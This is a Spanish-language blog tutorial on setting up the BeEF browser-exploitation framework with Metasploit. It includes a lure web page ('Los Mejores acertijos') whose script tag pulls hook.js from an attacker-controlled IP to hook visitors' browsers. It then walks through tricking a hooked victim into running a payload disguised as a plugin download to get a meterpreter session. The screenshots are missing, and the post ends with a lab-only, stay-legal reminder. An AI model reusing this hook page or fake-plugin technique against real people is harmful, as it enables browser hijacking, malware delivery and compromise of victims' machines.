viernes, 1 de abril de 2016

Beef

Beef es un framework que nos permite inyecciones XSS, las cuales nos indica la IP, nos da las características del equipo, lanzar exploits, etc.

En primer lugar, hay que cofigurarlo:

editamos /usr/share/beef-xss/config.yaml



En metasploit ponemos

enable: true

En evasion ponemos

enable: true



Guardamos y salimos.

Creamos un archivo beef.rc que contiene:

load msgrpc ServerHost=IPLOCAL Pass=abc123 (o si habéis cambiado la pass, la que sea).

Msgrpc es un servicio de Metasploit que le permite conectarse a aplicaciones externas.



Guardamos

Ahora editamos /usr/share/beef-xss/extensions/metasploit/config.yaml

En la parte de metasploit, en host, cambiamos 127.0.0.1 por la IP local.

En callback_host, cambiamos 127.0.0.1 por la IP local.

Beef tiene una página web por defecto, pero nosotros vamos a crear una:

<!doctype html>
<HTML lang=es>
<head>
        <title>Los Mejores acertijos</title>
</head>

<script src="http://192.168.1.134:3000/hook.js"type="text/javascript"</javascript>
<script>
var commandModuleStr='script src="'+window.location.protocol+'//'+window.location.host+'hook.js" type="text/javascript"><\/script>';document.write(commandModuleStr);
</script>
<body>

<br>
Has sido hackeado, te fastidias
<br>
</body>

</html>











La guardaremos e iniciaremos apache

service apache2 start

En el directorio /usr/share/beef-xss, ponemos

msfconsole -r beef.rc

Y en otra consola

./beef



Abrimos el navegador y ponemos la dirección:





username: beef
password: beef



Cuando la víctima pone:




Y nosotros ya lo tenemos como zombie:



Por ejemplo, podemos hacerle tragar un payload con la opción:


La víctima recibirá un mensaje en la que se le dice que tiene que descargar un pluggin, y, en realidad, será un payload que hemos creado. Ambas cosas las tendremos que configurar y darle al botón de ejecutar.

A la víctima le sale:



Y al ejectuarlo, ya tenemos nuestra sesión de meterpreter:



Otro día echaremos un vistazo a más cosas que se pueden hacer.

Recordad: Usad esto en vuestro laboratorio, sed, legales.


No hay comentarios:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.